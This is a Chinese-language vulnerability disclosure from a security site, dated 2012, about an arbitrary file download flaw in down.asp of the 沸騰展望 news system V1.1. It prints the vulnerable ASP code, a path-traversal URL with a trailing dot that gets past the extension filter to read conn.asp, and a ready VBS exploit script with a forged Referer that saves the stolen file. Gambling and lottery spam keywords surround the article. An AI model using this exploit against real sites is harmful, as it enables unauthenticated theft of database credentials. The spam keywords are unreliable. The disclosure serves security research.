浙江福彩3d走势图
我們來自五湖四海,不為別的,只因有共同的愛好,為中國互聯網發展出一分力!

沸騰展望新聞系統任意文件下載漏洞

2012年02月19日14:46 閱讀: 21053 次

標簽: 漏洞, 沸騰展望, 新聞系統, 文件下載

受影響版本:
沸騰展望新聞系統[核心:塵緣雅境] V1.1 Access版 Finish(SP3)

描述:
漏洞文件:
down.asp

Const adTypeBinary = 1 
FileName = Request.QueryString("FileName") 
if FileName = "" Then 
Response.Write "無效文件名!" 
Response.End 
End if 
FileExt = Mid(FileName, InStrRev(FileName, ".") + 1) 
Select Case UCase(FileExt) 
Case "ASP", "ASA", "ASPX", "ASAX", "MDB" 
Response.Write "非法操作!" 
Response.End 
End Select 
Response.Clear 
if lcase(right(FileName,3))="gif" or lcase(right(FileName,3))="jpg" or lcase(right(FileName,3))="png" then 
Response.ContentType = "image/*" '對圖像文件不出現下載對話框 
else 
Response.ContentType = "application/ms-download" 
end if 
Response.AddHeader "content-disposition", "attachment; filename=" & GetFileName(Request.QueryString("FileName")) 
Set Stream = server.CreateObject("ADODB.Stream") 
Stream.Type = adTypeBinary 
Stream.Open 

SavePath = FileUploadPath '存放上傳文件的目錄 
TrueFileName = SavePath & FileName 

Stream.LoadFromFile Server.MapPath(TrueFileName) 
While Not Stream.EOS 
Response.BinaryWrite Stream.Read(1024 * 64) 
Wend 




測試方法: 

[警 告] 

以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用.風險自負! 

http://www.target.com/down.asp?FileName=../conn.asp. 

(不需要登錄,用minibrowser偽造referer) 
VBS版利用 

Dim strUrl, strData 
strUrl = "http://www.target.com/down.asp?FileName=../conn.asp." 
Set xPost = CreateObject("Microsoft.XMLHTTP") 
With xPost 
.open "Get", strUrl, False 
.SetRequestHeader "Referer", strUrl 
.Send() 
strData = .responseBody 

End with 
Set sGet = CreateObject("ADODB.Stream") 
With sGet 
.Mode = 3 
.Type = 1 
.Open() 
.Write(strData) 
.SaveToFile "Conn.asp",2 
End with 

set sGet = Nothing 
set xPost = Nothin 
分享到: 更多
藍客門戶
©2001-2019 中國藍客聯盟 版權所有.
關于藍客聯盟歷史宗旨章程技術服務聯系我們藍客社區

浙江福彩3d走势图 晓游棋牌手机版最新版 黑龙江11选5免费软件 a股有什么好股票推荐 pk10三码技巧分享 乐彩开奖直播 重庆幸运农场 博远棋牌唯一官方网站 青海11选5软件 股票分析报告模板 君彩广东11选5破解版